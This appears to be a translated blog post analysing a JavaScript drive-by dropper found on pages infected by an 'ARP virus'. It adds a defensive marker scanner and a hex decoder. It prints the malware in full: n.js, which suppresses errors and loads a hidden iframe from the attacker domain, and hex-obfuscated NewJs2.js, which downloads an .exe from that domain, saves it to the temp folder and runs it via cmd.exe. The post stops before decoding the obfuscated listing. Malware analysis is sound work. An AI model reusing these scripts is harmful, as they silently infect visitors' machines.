JS techniques used by the ARP virus

The purpose of this article is to look at JS-related techniques; virus removal is not the main goal, it only sets the stage for explaining some JS. The article is a bit long, so pour yourself a coffee or a cup of tea and read it slowly; don't rush when learning!

Recently our company network was hit by the ARP virus that has been making the rounds these past few days. Nobody could get online, which caused a lot of trouble at work, so I'm writing down the cleanup process here in the hope that it helps others!

Symptoms:

Some web pages opened as garbled text. It looked random, yet apparently wasn't, because it kept watching msn.com (perhaps it has a grudge against Microsoft). Looking further at the page source, I found a JS file reference in the head: <script src=http://9-6.in/n.js></script>

Origin:

After some searching online, the domain turned out to be an Indian (.in) domain while its IP address is in the US, and the domain was registered on July 25, so it all looks premeditated. Let's set that aside and solve the problem first.

Analysis:

1. First download the JS file (http://9-6.in/n.js). Its code is as follows (the inner double quotes were lost when the listing was pasted; they are restored here as \" escapes):

  // Silence every JS error so the injected script never shows itself.
  document.writeln("<script>window.onerror=function(){return true;}</script>");
  // Pull in the second-stage script.
  document.writeln("<script src=\"http://9-6.in/S368/NewJs2.js\"></script>");
  document.writeln("<script>");
  document.writeln("function StartRun(){");
  document.writeln("var Then = new Date() ");
  // Cookie lifetime: one day from now.
  document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
  document.writeln("var cookieString = new String(document.cookie)");
  document.writeln("var cookieHeader = \"Cookie1=\" ");
  document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
  // If the marker cookie already exists, do nothing (one hit per day per victim).
  document.writeln("if (beginPosition != -1){ ");
  document.writeln("} else ");
  document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
  // Otherwise set the cookie and load the next page in an invisible iframe.
  document.writeln("document.write('<iframe width=0 height=0 src=\"http://9-6.IN/s368/T368.htm\"></iframe>');");
  document.writeln("}");
  document.writeln("}");
  document.writeln("StartRun();");
  document.writeln("</script>")


The first line, window.onerror=function(){return true;}, suppresses every JS error up front; pretty ruthless, but how else would it hide itself? Then there is a second JS file, http://9-6.in/S368/NewJs2.js; set that aside for now and keep reading. StartRun(); calls a function whose main job is to write a cookie that is kept for one day, and then to load another file (http://9-6.IN/s368/T368.htm) in a hidden iframe. Nothing else special here.
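As an added example (not code from the original post), the following scanner looks for the three markers this dropper leaves in a page: an external script tag from an unexpected host, a zero-size iframe, and a global onerror handler that swallows errors. SAMPLE_HTML and the trusted-host list are constructed here, and bad-host.example is a placeholder standing in for the real domain.

```javascript
// Added example (not from the original post): scan page HTML for the three markers the
// n.js dropper leaves behind. SAMPLE_HTML and the trusted-host list are constructed,
// and bad-host.example is a placeholder standing in for the real domain.

// Hostname of an absolute http(s) URL; relative URLs are same-origin, so null.
function externalHost(url) {
  if (!/^https?:\/\//i.test(url)) return null;
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

// Returns one finding per marker hit: { marker, host, fragment }.
function findInjectionMarkers(html, trustedHosts) {
  const findings = [];
  const trusted = new Set(trustedHosts.map(h => h.toLowerCase()));
  // n.js is injected with an unquoted src, so accept quoted or bare URLs.
  const scriptRe = /<script[^>]*\ssrc=["']?([^"'\s>]+)["']?[^>]*>/gi;
  for (const m of html.matchAll(scriptRe)) {
    const host = externalHost(m[1]);
    if (host && !trusted.has(host)) findings.push({ marker: "external-script", host, fragment: m[0] });
  }
  // Zero-size iframe used to load the second-stage page invisibly.
  for (const m of html.matchAll(/<iframe[^>]*>/gi)) {
    const tag = m[0];
    if (/\swidth=["']?0\b/i.test(tag) && /\sheight=["']?0\b/i.test(tag)) {
      const src = (tag.match(/\ssrc=["']?([^"'\s>]+)/i) || [])[1] || "";
      findings.push({ marker: "hidden-iframe", host: externalHost(src), fragment: tag });
    }
  }
  // Blanket error suppression that keeps the injected script silent.
  if (/window\.onerror\s*=\s*function\s*\(\s*\)\s*\{\s*return\s+true\s*;?\s*\}/i.test(html)) {
    findings.push({ marker: "error-suppression", host: null, fragment: "window.onerror=function(){return true;}" });
  }
  return findings;
}

// Constructed page resembling the infected one the post describes.
const SAMPLE_HTML = `<html><head><title>news</title>
<script src=http://bad-host.example/n.js></script>
<script src="/static/app.js"></script></head>
<body><script>window.onerror=function(){return true;}</script>
<iframe width=0 height=0 src="http://bad-host.example/s368/T368.htm"></iframe>
<p>page body</p></body></html>`;

for (const f of findInjectionMarkers(SAMPLE_HTML, ["www.example.com"])) {
  console.log(f.marker, f.host || "-", f.fragment);
}
```

Running it over a saved copy of an affected page reports all three markers; a clean page with only same-origin scripts and normally sized iframes reports none.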

2. Download the file (http://9-6.in/S368/NewJs2.js). Its code is as follows:

StrInfo = "x3cx73x63x72x69x70x74x3ex77x69x6ex64x6fx77x2ex6fx6ex65x72x72x6fx72x3dx66x75x6ex63x74x69x6fx6ex28x29x7bx72x65x74x75x72x6e x74x72x75x65x3bx7dx3cx2fx73x63x72x69x70x74x3e" +" "+
  "x3cx73x63x72x69x70x74x3e" +" "+
  " x44x5ax3d'\x78x36x38\x78x37x34\x78x37x34\x78x37x30\x78x33x41\x78x32x46\x78x32x46\x78x33x39\x78x32x44\x78x33x36\x78x32x45\x78x36x39\x78x36x45\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x46\x78x35x33\x78x33x33\x78x33x36\x78x33x38\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x66x75x6ex63x74x69x6fx6e x47x6ex4dx73x28x6ex29 " +" "+
  "x7b " +" "+
  " x76x61x72 x6ex75x6dx62x65x72x4dx73 x3d x4dx61x74x68x2ex72x61x6ex64x6fx6dx28x29x2ax6ex3b" +" "+
  " x72x65x74x75x72x6e '\x78x37x45\x78x35x34\x78x36x35\x78x36x44\x78x37x30'x2bx4dx61x74x68x2ex72x6fx75x6ex64x28x6ex75x6dx62x65x72x4dx73x29x2b'\x78x32x45\x78x37x34\x78x36x44\x78x37x30'x3b" +" "+
  "x7d " +" "+
  " x74x72x79 " +" "+
  "x7b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x76x61x72 x42x66x3dx64x6fx63x75x6dx65x6ex74x2ex63x72x65x61x74x65x45x6cx65x6dx65x6ex74x28"\x78x36x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x29x3b" +" "+
  " x42x66x2ex73x65x74x41x74x74x72x69x62x75x74x65x28"\x78x36x33\x78x36x43\x78x36x31\x78x37x33\x78x37x33\x78x36x39\x78x36x34"x2c"\x78x36x33\x78x36x43\x78x37x33\x78x36x39\x78x36x34\x78x33x41\x78x34x32\x78x34x34\x78x33x39\x78x33x36\x78x34x33\x78x33x35\x78x33x35\x78x33x36\x78x32x44\x78x33x36\x78x33x35\x78x34x31\x78x33x33\x78x32x44\x78x33x31\x78x33x31\x78x34x34\x78x33x30\x78x32x44\x78x33x39\x78x33x38\x78x33x33\x78x34x31\x78x32x44\x78x33x30\x78x33x30\x78x34x33\x78x33x30\x78x33x34\x78x34x36\x78x34x33\x78x33x32\x78x33x39\x78x34x35\x78x33x33\x78x33x36"x29x3b" +" "+
  " x76x61x72 x4bx78x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x44\x78x36x39\x78x36x33\x78x37x32\x78x36x46\x78x37x33\x78x36x46\x78x36x36\x78x37x34\x78x32x45\x78x35x38"x2b"\x78x34x44\x78x34x43\x78x34x38\x78x35x34\x78x35x34\x78x35x30"x2c""x29x3b" +" "+
  " x76x61x72 x41x53x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x34x31\x78x36x34\x78x36x46\x78x36x34\x78x36x32\x78x32x45\x78x35x33\x78x37x34\x78x37x32\x78x36x35\x78x36x31\x78x36x44"x2c""x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x41x53x2ex74x79x70x65x3dx31x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4bx78x2ex6fx70x65x6ex28"\x78x34x37\x78x34x35\x78x35x34"x2c x44x5ax2cx30x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4bx78x2ex73x65x6ex64x28x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x4ex73x31x3dx47x6ex4dx73x28x39x39x39x39x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  " x76x61x72 x63x46x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x33\x78x37x32\x78x36x39\x78x37x30\x78x37x34\x78x36x39\x78x36x45\x78x36x37\x78x32x45\x78x34x36\x78x36x39\x78x36x43\x78x36x35\x78x35x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x34x46\x78x36x32\x78x36x41\x78x36x35\x78x36x33\x78x37x34"x2c""x29x3b" +" "+
  " x76x61x72 x4ex73x54x6dx70x3dx63x46x2ex47x65x74x53x70x65x63x69x61x6cx46x6fx6cx64x65x72x28x30x29x3b x4ex73x31x3d x63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2cx4ex73x31x29x3b x41x53x2ex4fx70x65x6ex28x29x3bx41x53x2ex57x72x69x74x65x28x4bx78x2ex72x65x73x70x6fx6ex73x65x42x6fx64x79x29x3b" +" "+
  " x41x53x2ex53x61x76x65x54x6fx46x69x6cx65x28x4ex73x31x2cx32x29x3b x41x53x2ex43x6cx6fx73x65x28x29x3b x76x61x72 x71x3dx42x66x2ex43x72x65x61x74x65x4fx62x6ax65x63x74x28"\x78x35x33\x78x36x38\x78x36x35\x78x36x43\x78x36x43\x78x32x45\x78x34x31\x78x37x30\x78x37x30\x78x36x43\x78x36x39\x78x36x33\x78x36x31\x78x37x34\x78x36x39\x78x36x46\x78x36x45"x2c""x29x3b" +" "+
  " x6fx6bx31x3dx63x46x2ex42x75x69x6cx64x50x61x74x68x28x4ex73x54x6dx70x2b'\x78x35x43\x78x35x43\x78x37x33\x78x37x39\x78x37x33\x78x37x34\x78x36x35\x78x36x44\x78x33x33\x78x33x32'x2c'\x78x36x33\x78x36x44\x78x36x34\x78x32x45\x78x36x35\x78x37x38\x78x36x35'x29x3b" +" "+
  " x71x2ex53x48x65x4cx4cx45x78x65x63x75x74x65x28x6fx6bx31x2c'\x78x32x30\x78x32x46\x78x36x33 'x2bx4ex73x31x2c""x2c"\x78x36x46\x78x37x30\x78x36x35\x78x36x45"x2cx30x29x3b" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x7d " +" "+
  " x63x61x74x63x68x28x4dx73x49x29 x7b x4dx73x49x3dx31x3b x7d" +" "+
  " x4ex6fx73x6bx73x6cx61x3d''x3b" +" "+
  "x3cx2fx73x63x72x69x70x74x3e"
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65"](StrInfo);
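NewJs2.js hides its script text behind \xNN hex escapes, and the inner string values are hex-escaped a second time, so a single decoding pass still leaves them unreadable. The following decoder (an added example, not code from the original post) peels those layers on the source text without executing anything; the SAMPLE string is constructed to mirror the structure seen above and is not the real payload.

```javascript
// Added example (not from the original post): peel the layered \xNN hex escaping that
// NewJs2.js uses, working on the source text only, so nothing is evaluated. SAMPLE is
// constructed to mirror the structure seen on the page and is not the real payload.

// One textual layer: "\\" -> "\" and "\xNN" -> the byte's character.
function decodeHexLayer(text) {
  return text.replace(/\\(\\|x([0-9a-fA-F]{2}))/g, (m, esc, hex) =>
    hex ? String.fromCharCode(parseInt(hex, 16)) : "\\");
}

// Collapse the `"piece" +" "+ "piece"` concatenation idiom into one string body.
function joinPieces(text) {
  return text.replace(/"\s*\+\s*" "\s*\+\s*"/g, " ");
}

// Decode repeatedly until no \xNN escapes remain and return every stage, so an
// analyst can inspect each layer. maxDepth guards against pathological input.
function peelHexLayers(source, maxDepth = 4) {
  const layers = [joinPieces(source)];
  for (let i = 0; i < maxDepth; i++) {
    const cur = layers[layers.length - 1];
    if (!/\\x[0-9a-fA-F]{2}/.test(cur)) break;
    layers.push(decodeHexLayer(cur));
  }
  return layers;
}

// Constructed stand-in: the outer layer hides "<script>DZ='...';</script>" and the DZ
// value is hex-escaped a second time, so it only reads as text after two passes.
const SAMPLE = String.raw`StrInfo = "\x3c\x73\x63\x72\x69\x70\x74\x3e" +" "+
  "\x44\x5a\x3d'\\\x78\x36\x38\\\x78\x37\x34\\\x78\x37\x34\\\x78\x37\x30'\x3b" +" "+
  "\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"`;

peelHexLayers(SAMPLE).forEach((layer, i) => console.log(`layer ${i}: ${layer}`));
```

The same loop applied to the real file shows the first pass yielding readable code whose string arguments are still escaped, and the second pass revealing them.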

Time: 2024-09-11 10:34:07
